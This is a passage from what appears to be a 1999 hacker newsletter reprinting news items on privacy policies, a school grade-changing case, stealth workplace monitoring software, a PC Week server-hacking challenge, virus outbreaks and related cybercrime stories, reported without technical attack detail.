complying with already established privacy principles.
o Push for open profiles. Companies should be required to make customer
profiles available to users, similar to the My CDNOW section of CDNOW. The
profile should contain all partners with whom data is shared, the ability for
customers to control who the information is shared with and the option to
remove themselves from the list.
o Pressure third party privacy firms. Because independent privacy groups like
Truste and BBBOnline earn their money from e-commerce organizations, they
become more of a privacy advocate for the industry -- rather than for
consumers. The FTC should call for a consumer-based organization to provide
principles and redress.
-=-
HNN Privacy Statement
"You have zero privacy anyway, Get over it." -
Scott McNealy, Chief Executive Officer, Sun
Microsystems, Inc.
You have no Privacy. Remember that. So what is the
purpose of this document? Well Microsoft and IBM will not
advertise on web sites without "Privacy Statements".
Where Microsoft and IBM travel others are sure to follow.
So to appease the advertising companies we post this
document, not because it will make any difference in the
long term but to make some people feel good.
Like it or not about the only way HNN can pay its bills is
with banner ads. No one likes them. But without them we
would not be able to buy any beer and that would be
worse. Face it this site is a lot of work and if it wasn't for
the fifty bucks in beer money those banner ads earn us
each month it is doubtful HNN would exist in the same
format. We have to get drunk once in a while.
So to appease the people with the money (i.e.
advertisers) we will post a privacy statement that details
what we will and will not do with any information you
choose to provide to HNN. This is just a statement. Of
course we reserve the right to change this policy at any
time and we may or not update this page. Since there is
no law that says we have to, why bother.
If you do not want to provide any information to HNN and
wish to remain completely anonymous (to us anyway)
then don't visit the site, or check out the folks at Zero
Knowledge (we sure hope they go gold soon). Just by
visiting you are giving us information about you.
Information we log, and store, and look at, and analyze
and drool over while we drink the aforementioned beer.
Yes, we lead exciting lives.
By connecting to HNN via http (the web) you provide us,
and any other web site, your IP address, your browser
type, your operating system, etc... all standard web log
stuff. Nothing to personal. If your DNS actually resolves
then we can find out approximately what part of the world
you are in and who your ISP is. Do we have time to do all
that? No. Do we want to? No. Do we care? No. Does it all
get written down in logs for us to look at if we so choose?
Yes.
If you choose to send us mail with our online web forms
there is data gathered there too. Web forms are not
anonymous. Not on our site or any other. Web forms will
automatically grab your IP address, browser and OS
types, and append that information to the email. Do we do
anything with this information? No. We do use it internally
sometimes to verify when one person is trying to send us
bogus stories, though.
If you choose to send us mail with the likes of HotMail,
Yahoo, or any one of the dozens of other free email
services you should be aware that the IP address of the
person who composed the email is usually stored within
the header. Again, we don't do anything with this
information other than to determine where certain stories
are from.
Email is stored locally for approximately one month,
sometimes less, sometimes more. Depends on how much
we have had to drink and how full the hard drive is. Then
it gets deleted never to be seen again. At the moment the
machine that email is stored on is not backed up so don't
worry about the feds taking all of our old tapes. We will
absolutely NOT harvest email address from our received
email and sell them to advertisers (Yes, we have been
asked to sell such lists). SPAM is evil, and must be
stopped. We will not contribute to its propagation under
any circumstances!
Speaking of the authorities, if they ever show up with a
search warrant they can gladly have all of our equipment.
I just hope they bring a very large truck and several burly
moving men. What this means to you is DO NOT send us
email about illegal activities you are planning. This only
implicates us and forces us to inform the authorities. Yes,
we will do that. We have a moral obligation to report
crimes and do not encourage such activities.
So what can you do about your general lack of privacy?
First, stop giving it away, stop filling out questionaires or
applying for things you don't need. Second, follow some of
these links and learn some more.
General Privacy on the Net Rant - Stolen from Freedom
Networks with Permission. A must read for the uninitiated.
http://www.hackernews.com/misc/private.html
NewOrder Box - Lots of Privacy and Anonymity Links
http://neworder.box.sk/box.php3?gfx=neworder&prj=neworder&key=anonym&txt=Anonymity
The Electronic Frontier Foundation - Fighters for Online Privacy
http://www.eff.org/
@HWA
11.0 Grade Changers Sentenced
~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by riot
Two students of Evergreen High School who broke into
the school computer systems and changed grades for
31 fellow students have plead guilty. The perpetrator
was charged with computer trespass and received a 30
day sentence with one year of probation. The students
who paid to have their grades changed have not been
charged but where suspended from school for 10 days.
The Columbian
http://www.columbian.com/09181999/front_pa/80694.html
SCHOOL COMPUTER HACKER PLEADS GUILTY
Saturday, September 18, 1999
By STEPHANIE THOMSON, Columbian staff writer
Adam Jerome, the hacker who boosted grades for
fellow students at Evergreen High School, pleaded
guilty Friday to one count of felony computer
trespass.
He is to be sentenced Oct. 7 by Superior Court
Judge Barbara Johnson.
Jerome's money man in the scheme, Phillip
Latimer, pleaded guilty Friday to misdemeanor
computer trespass and was handed a 30-day
sentence. Latimer, 18, will spend two days in Clark
County Jail. The other 28 days will be served on
work crew, and he will be on probation for one
year.
"Mr. Latimer was essentially the marketing
person for Mr. Jerome's services," said deputy
prosecutor Beau Harlan, in explaining to Judge
Johnson why Latimer was allowed to plead to the
lesser charge.
Latimer collected about $170 from students who
wanted their transcripts altered.
Jerome, 18, likely will face a stiffer punishment.
Harlan said he will recommend a 90-day
sentence for Jerome, who was on juvenile
probation for burglary when he hacked into the
school district's computer system.
"I'm not saying it's the crime of the century, but
it's serious," Harlan said Thursday. "It has cost the
school district a lot of money and caused a lot of
concern."
Harlan said Jerome altered 31 transcripts by
boosting grades, adding credits for courses not
taken or modifying schedules. Of those 31
transcripts, 22 belonged to students who paid
between $2 and $80 for the services. Some
students had as many as 15 or 16 grades changed,
including one for a course called "You and the
Law."
Harlan told Judge Johnson that school officials
estimate it will cost more than $15,000 to upgrade
the security on the computer system.
Latimer and Jerome will be ordered to pay
restitution, as yet undetermined.
Jerome leaves next week for his freshman year
at Seattle University.
"The goal, obviously, is to have the sentence
work out with his school schedule," said his
attorney, Jon McMullen.
He said his client had no idea hacking into the
school's computer system was a felony.
"He knew what he was doing was wrong, but
it's a question of how wrong," McMullen said after
the court hearing. "The concept was that it was a
school thing, like erasing grades in a grade book.
He thought he might be expelled, but not labeled a
felon for the rest of his life."
Latimer's court-appointed attorney, Mary
Arden, said Latimer attends Summit View High
School in Battle Ground and needs 21/2 credits to
graduate. Latimer plans to attend Clark College in
January with the goal of transferring to four-year
college, Arden said, and works for his brother's
construction company.
He also volunteers for Habitat for Humanity,
and Arden asked that he be sentenced to perform
community service.
But Johnson opted for jail and work crew.
"I think you should have some idea what that
experience is like," Johnson told Latimer, who has
no prior criminal record.
She asked why he participated in the scheme.
Latimer apologized and said the hacking started as
a prank.
"To this day I can't really say why I did it,"
Latimer said. "I just honestly know it was a
mistake."
As for the students who paid to have their
grades changed, Prosecutor Art Curtis said Friday
morning his office decided not to charge them with
any crimes.
"The only two individuals referred to
prosecutors by the Evergreen School District were
Mr. Jerome and Mr. Latimer," Curtis said. "The
district believes that all of the other students
involved in this situation were punished
appropriately by the school."
The students most of them seniors were
suspended for 10 days. Jerome was expelled and
not allowed to attend the graduation ceremony.
"We believe prosecution of the two most
culpable individuals serves justice in this case,"
Curtis said. "And we hope the students who are
not going to be prosecuted appreciate the break
they are getting."
Jerome's name surfaced in late April, when a
student told a teacher of a grade-changing scheme.
Jerome cooperated with school district officials and
police investigators, identifying the students with
altered records and showing administrators in the
district's computer office how he found lapses in
the system.
@HWA
12.0 Similar B02K Product Goes Commercial
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Weld Pond
So Cult of the Dead Cow gets raked over the coals for
releasing B02K. Now this company is getting thousands
of dollars from high-profile corporations and government
agencies for essentially the same thing. This new
remote admin tool/trojan is called Investigator 2.0 from
WinWhatWhere. Will the Anti Virus vendors add this
software to their list of checked for items? Is the
difference between a malicious trojan and a helpful
program just the price tag?
TechWeb
http://www.techweb.com/wire/story/TWB19990917S0014
Wired
http://www.wired.com/news/news/politics/story/21847.html
TechWeb;
TechWeb;
Stealth Software Rankles Privacy
Advocates
(09/17/99, 5:19 p.m. ET)
By Stuart Glascock, TechWeb
A super stealthy software covertly monitors
all keyboard and application activity, then
invisibly e-mails a detailed report to the
employees' boss. While it bolsters IT's
ability to monitor workplace computer
usage, it troubles privacy advocates.
The newly upgraded software, Investigator 2.0 from
WinWhatWhere, runs silently, unseen by the end-user
as it gathers exacting details on every keystroke
touched, every menu item clicked, all the entries into a
chat room, every instant message sent and all
e-commerce transactions.
"You get shocking detail," said Richard Eaton, president
of WinWhatWhere, in Kennewick, Wash.
In one client case, a large grocery store chain suspected
an employee was wrongfully taking information.
Management installed the software and discovered the
suspect employee was saving accounting information
onto a diskette. In other cases, employees have been
busted for taking client lists and sales leads.
WinWhatWhere Customers have included sensitive
government agencies, private investigators, a trucking
company, a tool and die company, a penitentiary, a
dentist, and several libraries. Specific customers have
included the U.S. State Department, the U.S. Mint in
Denver, Exxon, Delta Airlines, Ernst & Young, the U.S.
Department of Veteran Affairs, and Lockheed Martin.
"People buying it the most are people in corporations
who need it because they suspect something is going on
in a department, so they put on a computer for a small
amount of time," Eaton said.
While it may sound Orwellian, electronic monitoring can
serve a purpose, said Jan Kallberg, chief operating officer
of CyberDefense, a New York company specializing in
protecting corporate digital assets.
"It can be a good thing if the
rules are set and everybody
knows the policies, then it eliminates the risk that
someone gets blamed who is without any guilt," he said.
It is not surprising that major employers are concerned
about employee computer use, but monitoring all their
keystrokes is frightening, said Lou Maltby, ACLU
director of employment rights.
"Employers who practice this kind of monitoring don't
have a clue as to what they are getting into," Maltby
said. "People now turn to the Web for all kinds of
information, including information about the most
sensitive personal issues imaginable. If you are a
member of [Alcoholics Anonymous], 20 years ago, you
went to a meeting. Today, you are just as likely to talk
to your support group over the Web. The same is true
for incest survivors and people who are HIV positive. If
you want to pry into your employees' deepest, darkest
secrets, there couldn't be a better way."
Workplace electronic monitoring calls out for new
privacy legislation, Maltby said, adding it is illegal for
employers to listen in on an employee's telephone call to
a spouse. But the same conversation over e-mail could
be read and posted on a bulletin board. No legislation
to address the issue is currently pending.
Privacy concerns aside, most corporations need
protection, and not just from people who are hacking
into their network, but from people working inside the
firewall, Eaton said.
"If it is used incorrectly it is horrible," Eaton said." If you
put it on with no suspicion or reason, that's wrong. But
if you suspect something is going on your equipment,
you have every right to do this."
Pricing runs from $99 for a single user to $5,500 for
site licensing.
@HWA
13.0 Mitnick, Encryption and the Law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Adam
A lot of people think the Mitnick case is done and over
but in legal circles the wrangling is just beginning. With
the wacky and unprecedented rulings made by Judge
Pfaelzer regarding encrypted evidence legal experts may
be studying this case for a while.
Forbes
http://www.forbes.com/penenberg
(Url provides a 404 error, tried appending .htm, .html and .asp etc -Ed)
14.0 Another 'hacker' challenge
~~~~~~~~~~~~~~~~~~~~~~~~~~
In all fairness to PCWEEK they did ask how YOU would go about testing
new security software... - Ed
Another 'Hacker' Challenge
From HNN http://www.hackernews.com
contributed by David
PC Week has taken a novel step and decided to actually
test the security of certain internet products. This
attempt should commended. Unfortunately the method
they chose isn't very scientific and is designed more for
publicity than anything else. With two servers, one NT
with IIS and one RedHat with Apache, the editors of PC
Week have invited the public to attempt to break in and
have offered a measly $1,000 gift certificate to anyone
who is successful. Any conclusions PC Week makes from
this experiment will not be very indicative of the real
world and will give consumers inaccurate information.
Hack PC Week
http://www.hackpcweek.com
APB Online
http://www.apbnews.com/newscenter/internetcrime/1999/09/20/hack0920_01.html
News Alert
http://www.newsalert.com/bin/story?StoryId=Cn:wXqbWbtLLnmda5&FQ=Linux&SymHdl=1&Nav=na-search-&StoryTitle=Linux
Hack PC Week;
Hack Our Servers and Win a $1000 Gift Certificate
How do you test security? Install similar applications on
two operating systems and invite the world to come in.
Departing from static testing these server are running a
real world application, based on a classified ad system for
a newspaper. This will test not only the operating system
but the entire implementation. For NT this includes ASP, IIS
and MTS, and SQLServer 7, while Linux will use Apache and mod_perl.
A sample logfile of activity (200k over 30minutes) during 'peak'
attack times is available for perusal here:
http://www.hackpcweek.com/axentlogsm.html
APB Online;
Magazine to Hackers: We Dare You
Issues $1,000 Challenge to Break Into a New Web Site
Sept. 20, 1999
By David Noack
NEW YORK (APBnews.com) -- Most Web
sites -- like The Drudge Report, the American
Stock Exchange, NASDAQ, ABC and the
NAACP, all victims in a recent rash of hacking
attacks -- would prefer that hackers never took
an interest.
But one computer magazine's testing lab is
actually enticing hackers to take a shot.
PC Week Labs has created a Web site for the
specific purpose of challenging hackers, and is offering a $1,000 gift
certificate to the computer cracker who breaks into the site.
The site is already operating and will remain online for one month --
assuming it doesn't get knocked out sooner.
Trying to mirror targeted sites
PC Week magazine is part of the Ziff-Davis family of computer magazines,
which range from Computer Shopper to PC Computing. The company also
operates several computer and high-tech Web sites and a computer news
cable television channel.
The challenge comes after a group calling
itself the ULG, for United Loan Gunman,
claimed responsibility for the latest string of
attacks. Computer security experts are trying
to determine if they are the same group as HFG, or Hacking for Girlies,
which crippled The New York Times on the Web last September.
In an effort to make the testing as accurate as possible, PC Week Labs is
using "near-identical" systems and server software as the Web sites that
were hacked, which is a combination of Microsoft's Windows NT 4.0, which
is running Internet Information Server (IIS), and Red Hat Linux 6.0, which is
using the Apache server.
Aim is to help public
The intended hack is a classified ad engine application running on each of
the two operating systems, and hackers are suppose to break into the site,
mark up the home page and steal user information.
"Security is extremely important in the Internet environment, and both
Microsoft and the Linux community, via Red Hat, boast that their operating
systems are secure," said John Taschek, director of PC Week Labs.
He said plans for the hacking challenge were in place months before the
high-profile hacking attacks.
"Our main goal is not to show which OS is most vulnerable," said Taschek.
"We anticipated there would be many times more attempts to break into
the NT site than the Linux site, simply because more people are familiar
with it, and more people have an agenda against Microsoft. Our goal is to
document how the hackers and crackers broke in and then to release to
the public, in the form of a story, how companies can boost up their
defenses against such attacks."
A challenging trend
The entire challenge will be tracked with the number of each hacking
attempt for the different operating systems and reported in an upcoming
issue of PC Week magazine.
The Web site is being hosted by AboveNet, a San Jose, Calif.-based
Internet service provider, and is using two-way servers from Compaq and
Dell.
The hacking challenge is part of a growing trend by companies and
computer security concerns to engage in so-called ethical hacking, where
hacking attempts are made to discover server vulnerabilities. Companies
are either hiring or contracting with hackers or security firms to perform the
service.
Critics call it 'publicity stunt'
Critics say hacker challenges are nothing more than public relations efforts
that prove little.
"Hacker challenges and the like are nothing more than publicity stunts.
Unfortunately they are becoming more and more popular with vendors
these days," said Space Rogue, editor in chief of the Hacker News
Network. "It gives them a very strong marketing angle: 'Our product
withstood umpteen-million hack attempts during our latest challenge.' This
just paints an inaccurate picture to the consumer. The consumer thinks
that oh, wow, it must be secure."
He said that companies involved in Internet security typically don't conduct
hacker challenges.
"The most knowledgeable people in the security business are busy making
a living fulfilling paid contracts from vendors who want a real security
analysis. They/we don't have time to feed someone else's marketing
machine," said Rogue.
Checking security components
Taschek said that any time a company conducts a hacker challenge it's
deemed a publicity stunt but insisted this one was different.
"We feel we're actually doing companies a favor by releasing details of how
hackers were successful and what worked well in our defense. I can assure
you that we're not just doing this for publicity," said Taschek, who added
that the magazine was not approached by any company to conduct the
test.
Rogue did say he's glad to see that the challenge is testing different
security components.
"About the only interesting thing I can see on this whole setup is that they
are 'testing' more than one thing. They have a complete e-commerce setup,
which is good because sometimes vulnerabilities in a product only appear
when used with other products," said Rogue.
Computer attacks on the rise
In the 1999 Computer Crime and Security Survey by the Computer Security
Institute and San Francisco office of the FBI, it found that hacking by
outsiders increased for the third year in a row, with 30 percent of
respondents reporting intrusions. The survey was released in March.
The survey is gleaned from responses from 521 security practitioners in
U.S. corporations, government agencies, financial institutions and
universities.
Those reporting their Internet connection as a frequent point of attack rose
for the third straight year, from 37 percent of respondents in 1996 to 57
percent in 1999.
Unauthorized access by insiders also rose for the third straight year, with
55 percent of respondents reporting incidents and 26 percent reporting theft
of proprietary information.
More attacks get reported
The survey also discovered a dramatic increase in the number of
respondents reporting serious incidents to law enforcement: 32 percent of
respondents did so, a significant increase over the three prior years in
which only 17 percent reported such events.
For the third consecutive year, financial losses due to computer security
breaches amounted to more than $100 million. Fifty-one percent of
respondents acknowledged suffering financial losses from such security
breaches, but only 31 percent were able to quantify their losses.
The most serious losses occurred through theft of proprietary information
(23 respondents reported a total of $42.5 million) and financial fraud (27
respondents reported a total of $39.7 million).
Outside threat rises
Although the results indicate a wide range of computer security breaches,
a growing trend is the continued increase in attacks from outside the
organization.
The trend was reinforced by other survey results. For instance, of those
who acknowledged unauthorized use, 43 percent reported from one to five
incidents originating outside the organization, and 37 percent reported from
one to five incidents originating inside the organization.
David Noack is an APBnews.com staff writer (david.noack@apbnews.com).
News Alert;
September 20, 1999 08:18
PC Week Labs Challenges Hackers To Crack Web Site; Establishes hackpcweek.com To Assess Security of
Windows NT and Red Hat Linux Systems
FOSTER CITY, Calif., Sept. 20 /PRNewswire/ -- In a major test of the security of Linux and Windows NT, PC Week Labs today threw down the gauntlet to Internet hackers,
challenging them to break into a Web site, http://www.hackpcweek.com, to try to crack each or both of the operating systems. The site goes live today for a one-month
trial.
The site contains near-identical systems, one running Windows NT with Internet Information Server (IIS) and the other running Red Hat Linux 6.0 with Apache as its web
server. PC Week Labs created similar classified-ads engine applications running on each system. The challenge is to break into the site, mark up the home page and steal
user information from the classified-ads engine.
"Security is extremely important in the Internet environment and both Microsoft and the Linux community, via Red Hat, boast that their operating systems are secure,"
noted PC Week Labs Director John Taschek.
PC Week Labs will track the number of attempts for each operating system and report the results in an upcoming issue of PC Week. Additionally, PC Week will issue a
prize to whomever hacks into the site first. The challenge terminates when the first hacker accomplishes any of the test challenges. Winners will receive
computer-equipment gift certificates of up to $1,000.
"Corporations, financial institutions and government agencies are susceptible from attack via the Internet," Taschek said. He cited figures from a 1999 survey conducted by
the Computer Security Institute and the FBI indicating that organizations reporting their Internet connection as a frequent point of attack rose for the third consecutive year
to 57 percent in 1999 from 37 percent in 1996. Financial losses due to computer security breaches were reported as exceeding $100 million this year.
Taschek also noted that, in recent weeks, the Nasdaq/Amex, the Drudge Report and ABC sites were all hacked in someway. Each of these three web sites runs either
Windows NT with IIS or Linux as their front-line web servers.
The hackpcweek.com site, being hosted by AboveNet, a San Jose, Calif.-based Internet service provider, is using Compaq and Dell two-way servers. PC Week Labs
created similar applications running on each system. For Windows NT, PC Week developed a classified ads engine based on a Microsoft guest book application; for Linux,
the Labs chose Smart Photo Ads, a popular classified-ads engine for the platform.
In addition, the competition is "open" to the general public via the Internet so that people can view how hacks are being made. Visitor interaction is encouraged and an
online discussion database will track users feelings about whether Windows or Linux has more open standards.
About PC Week
PC Week reaches 400,000 core e-business IT buyers at 217,000 Internet-connected sites. These buyers purchase Internet and intranet products and services, networking
and systems products for their organizations. They have an average budget authority of $11.9 million. PC Week delivers essential investigative news, solutions evaluation,
and business strategy for those charged with building .com enterprises. (Source: BPA)
About Ziff-Davis
Ziff-Davis Inc. is a leading media and marketing company focused on computing and Internet-related technologies, with principal platforms in print publishing, trade shows
and conferences, online content, television and education. Ziff-Davis provides global technology companies with marketing strategies for reaching key decision-makers.
Ziff-Davis has two series of common stock: one which is intended to track the performance of its Internet business ZDNet, and one which is intended to track the
performance of the ZD Group, which includes print publishing, trade shows and conferences, education, market research and television businesses and an 83 percent
retained interest in ZDNet.
SOURCE Ziff-Davis Inc.
/CONTACT: Barry Zusman of Plesser Associates, 212-319-8383,
bzusman@plesser.com, for PC Week/
/Company News On-Call: http://www.prnewswire.com/comp/987950.html or fax,
800-758-5804, ext. 987950/
/Web site: http://www.hackpcweek.com/
@HWA
15.0 9999 Caused at Least One Problem
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Code Kid
A pharmaceutical factory on the southern island of
Hainan in China crashed on September 9, 1999. The
crash effected 11 systems and 20 platforms. This is the
only reported crash that we know of due to this bug.
Inside China Today
http://www.insidechina.com/news.php3?id=93699
China Reports First Crash From '9999' Bug
BEIJING, Sep 21, 1999 -- (Reuters) A
pharmaceutical factory in China suffered a computer
crash on September 9, 1999, when the system read
the date as a command to stop, the China Youth
Daily reported on Tuesday.
A system at the factory on the southern island of
Hainan read the date as an old programming cut-off
code in which four nines were used to tell computers
to stop processing data, it said.
China, believed to be one of the less well-prepared
countries for the Y2K computer bug that some
feared the four nines code would foreshadow, had
reported no problems on September 9.
The newspaper said the Hainan factory suffered a
crash of 11 systems and 20 platforms, but
production was not affected.
The factory director was warned the systems were not millennium-compliant,
but ignored requests for new computer equipment and service systems, the
newspaper said.
The Y2K, or millennium, bug could cause chaos in old computers
programmed to recognise years by the last two digits and could confuse
1900 with 2000 and crash.
A U.S. State Department report published earlier this month said inland
Chinese cities faced potential Y2K computer problems affecting banking,
communications, medical services and power.
However, China reported on Monday that a third and final Y2K test of its
financial system over the weekend was a success.
(C)1999 Copyright Reuters Limited. All rights reserved. Republication or
redissemination of the contents of this screen are expressly prohibited without
the prior written consent of Reuters Limited.
@HWA
16.0 Japans Virus Infestations at Record Pace
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Code Kid
The Information Technology Promotion Agency has
reported 2,451 virus infestations so far this year. This
has already exceeded the entire number of cases from
all of 1997 which totaled 2,391, the most ever recorded.
The most prolific viruses reported where Happy99,
Melissa and ExploreZip with the highest infection method
coming through email.
Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/82335
Virus Infections in Jan.-Aug. Surpass Yearly Record of 1997
September 20, 1999 (TOKYO) -- The number of computer virus infections in Japan in
August reached 216 cases, and in the January-August period it registered 2,451,
according to a report released by the Information Technology Promotion Agency
(IPA).
The number of cases reported in recent months has trended downward. However, the
January-August damage cases exceeded the 1997 number of 2,391, the largest annual
total. It is now certain that 1999 will have the biggest number of damage cases
reported in a single year.
There were 25 types of virus incidents reported in August. Of those, Ska (nicknamed
Happy99) was reported most frequently, or 66 times. E-mail infections accounted for
76 percent of all infections.
According to the IPA, the trend in virus reports submitted in August was similar to
that of the previous month. The types of virus cases spread through e-mail increased,
including Happy99, Melissa and ExploreZip. New types appeared one after another,
including W97M/Opey, which was reported in August.
The IPA is warning users to take thorough prevention measures such as (1) to open
files attached to e-mail only after having them inspected by anti-virus software, and
(2) to constantly update virus-defining information through anti-virus software.
Related story: Computer Viruses in Japan on Steep Rise in Jan.-June '99; Close to '98
Total
(BizTech News Dept.)
17.0 Another Word Macro Virus Found
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Michelle
After scouring the the alt.sex hierarchy of Usenet the
researchers at Network Associates have found and
identified yet another Word Macro Virus. The Suppl
Word macro virus, which was found in over 25 alt.sex
newsgroups, has been given a medium risk rating.
Computer World
http://www.computerworld.com/home/news.nsf/all/9909201virus
(Online News, 09/20/99 12:06 PM)
New Word virus hits Net
By Douglas F. Gray
LONDON -- Network Associates Inc. today announced it
has given a medium risk rating to a new virus posted to
Usenet newsgroups over the weekend.
The Suppl Word macro virus, which was posted to over
25 alt.sex newsgroups was discovered by Network
Associates' 24-hour Anti-Virus Emergency Response
Team on Friday, the antivirus software vendor said in a
statement issued today. The recent Melissa virus was
also discovered in the alt.sex newsgroups, the statement
added.
The Suppl virus has destructive power similar to
ExploreZip.Worm, which infected machines running
Microsoft Corp. programs in June, according to Network
Associates. Users infected with Suppl will spread the
virus, as well as suffer data loss, Network Associates
said. After the user is infected, the virus automatically
attaches a document called "SUPPL.DOC" to all
outgoing mail.
Approximately 163 hours after infection, the virus then
renders files with certain suffixes, such as .doc,
inaccessible.
@HWA
18.0 News from Sla5h our new Croatian correspondant
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sla5h can be reached here: smuddo@yahoo.com
18.1 Lawyer: Hackers Have Rights, Too
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Sla5h, smuddo@yahoo.com
Hackers, virus spreaders, and other computer criminals
are hard to catch but easy to convict -- mainly because
they almost always confess. So says Jennifer Stisa Granick,
a San Francisco-based criminal defense lawyer who specializes
in cybercrimes. Her clients include arch-hacker Kevin
Poulsen, who in the early 1990s ran riot through Pacific
Bell's computer system, electronically swiped a Porsche
from a radio station, and evaded pursuing Feds for 17 months
before winding up behind bars on a four-year sentence.
Once they are caught, hackers like Poulsen generally
confess, in part because of the unformed state of cyberlaw,
Granick said Thursday at Black Hat Briefings, an annual
cybersecurity conference in Las Vegas.
There are no clear rules on how to measure damage
done by a hacker, Granick explained to a roomful of security
professionals gathered at the Venetian casino-hotel.
For instance, prosecutors can claim that a hacker
who gained access to a list of thousands of credit cards
had the potential to steal millions of dollars worth of
credit, and so should be charged as if he had executed
the theft. The affected company can then add on the cost
of restoring its breached system's security.
"Companies come in with these hugely inflated estimates
of damages that are like a sword hanging over your head," said Granick.
"That scares defendants and attorneys into cutting a deal."
The ephemeral nature of the forensic evidence computer
criminals leave behind makes catching them uniquely difficult.
Burglars often leave fingerprints, are seen by
eyewitnesses, or trip up and reveal their connection to
stolen items. Electronic criminals, however, can mask their
identity by forwarding email through anonymous re-mailing servers
or through encryption, and what they steal, damage, or just view
without authorization can go long unnoticed.
Trusting the digital evidence that exists is tricky,
too, since electronic information can so easily be erased or
altered. Still, prosecutions of computer crimes are rising,
said Granick.
Law enforcement agencies -- particularly the Department
of Justice, which goes after most cyber-scofflaws -- are boosting
funding for and training on cybercrimes, she said.
"When you've got more money and better training, you start
finding more criminals." Unlawful possession of credit card information,
unauthorized intrusions into Web pages, and sending out viruses are
among the most commonly prosecuted transgressions.
@HWA
18.2 Cracking for the Man
~~~~~~~~~~~~~~~~~~~~
Contributed by Sla5h, smuddo@yahoo.com
Nearly two years ago, when Jeff Moss took a job as director
of security assessment for Secure Computing, the idea of
hacker types joining the computer security work force seemedfar-fetched.
Not any more.
Applications from even the big-name companies were
notoriously full of holes, after all, and there weren't many
people who knew how to find them.
"Companies hired people from the underground because
there were no other people available," said Moss, who is also
known in tech circles as the organizer of DefCon, the annual
Las Vegas gathering of hackers and computer security types.
Although corporations shied away from hiring anyone
with an actual criminal record, they weren't picky about how
somebody acquired their skills. So a mini-industry emerged
around the idea of "ethical hacking."
The phrase inspires images of black-clad code pushers
trading in underground connections for a corporate job, but
the reality is more mundane.
"There are a lot of people from the hacking scene who
are in corporate America, working away," Moss said. "There's
no incentive for them to draw attention to their past."
These days, Moss is doing what he can to establish closer ties
between the security side and the hacker underground. In July,
he organized the third session of Black Hat briefings, a computer
security conference bringing together corporate types, freelance
hackers, and government officials to hash out hot topics affecting
the industry.
The last session, held in Las Vegas, touched on everything
from the psychological profiling of virus writers to the military
strategy for defeating cyber-terrorists.
This fall, Moss is ranging far afield, launching Black Hat
seminars in Amsterdam and Singapore, with a similar mix of
officials and geeks.
"It has that sort of mystique in the sense of the people
who are speaking," Moss said. "One might be in a business suit,
and then you'll have a guy from Canada with blue hair talking about
ways to subvert dynamic routing protocols."
Edginess aside, Moss said he hopes to keep the focus pre
tty
technical. The hot topic will be computer forensics: the collection
and analyzing of information after a break-in occurs to evaluate
damage and track down perpetrators.
@HWA
18.3 Moscow Mayor's Site Hackski'd
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Sla5h, smuddo@yahoo.com
Moscow Mayor Yuri Luzhkov, fresh from winning an important
legal victory for his parliamentary election bloc,
faced a surprise attack from cyberspace Thursday.
Luzhkov's Fatherland party election campaign headquarters
said opponents had opened a bogus page on the Internet which
copied his official site but had data "blatantly distorting
Luzhkov's position and the facts of his private life."
"It is an unworthy move from the moral and ethical point
of view," a spokesman for Luzhkov's campaign headquarters said.
"This was created by a competing political organization."
Luzhkov is becoming one of Russia's most influential
politicians: As well standing for re-election as mayor on 19
December, his party is also expected to do well in national
parliamentary elections.
He is also tipped as a possible candidate in presidential
elections next year.
But some critics have zeroed in on his authoritarian
style and the bogus Web site capitalizes on this point.
Located at www.lujkov.ru, instead of the official
www.luzhkov.ru, the page shows him having turned Moscow into
his private empire, where his friends and relatives rule the
roost. There are also cartoons and photographs ridiculing the mayor.
Luzhkov's entry into national politics has been strewn
with difficulties. Wednesday he fought and won a battle in the
Supreme Court to be allowed to run in the parliamentary vote.
A new party of regional governors is also in the making,
aiming to undermine the alliance which Luzhkov has built with other
regional bosses for the elections. Luzhkov numbers the Kremlin
itself as one of his key political opponents.
@HWA
18.4 Anti Software Piracy Ads Entice Tattlers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Sla5h, smuddo@yahoo.com
An advertising campaign against software piracy started in
New York in July has yielded dozens of leads from workers
willing to tattle on their companies.
The Business Software Alliance, a software industry-backed group
that combats piracy, spent $250,000 in July to buy billboards in
Times Square, ads on the Howard Stern radio show, and posters on
subway trains. The ads say "Hey, worker bee, use that stinger for
a change, report software piracy."
The ads resulted in 60 leads for lawyers to follow up, said Karine
Elsen, BSA marketing director in Washington.
"It's been a very successful campaign," Elsen said.
Software piracy, from people downloading programs off the Internet
or copying a program from their work computer and distributing it
to friends, cost the $140 billion industry $11 billion in revenue
last year, according to BSA. In 1998, U.S. businesses paid $4.5
million in fines and legal fees.
The worker bee campaign, now being waged in Chicago, brings in about
150 leads a month from throughout the United States, Elsen said. A
good lead gives the group enough information to approach the accused
company to do a self-audit. The New York leads have not produced any
action on BSA's part so far.
"It's too early for us, it takes a while," she said.
BSA is an international group with offices in London and Singapore.
Elsen said the stinger campaign has not been used in overseas markets.
"I don't think those workers would consider themselves worker bees,"
she said. "We do get good results from New York, maybe because there
are more disgruntled people."
@HWA
18.5 SERBIA THE FIRST CYBERWAR?
~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Sla5h, smuddo@yahoo.com
via Help Net Security http://www.net-security.org/
by Thejian, Friday 23rd September 1999 on 0:55 am CET
The United States put together its first small group of information warriors, a move that has convinced some Defense experts that the military waged a cyberwar against Serbia this year. According to a high-level draft briefing paper the group of information warriors -- or what the Defense Department refers to as an information operations cell -- was one of the "great successes'' of the 78-day war. According to the draft briefing, information operations (IO) have "an incredible potential" and that "properly executed, IO could have halved the length of the campaign." Federal Computer Week
FULL STORY :
TAKEN FROM FEDERAL COMPUTER WEEK
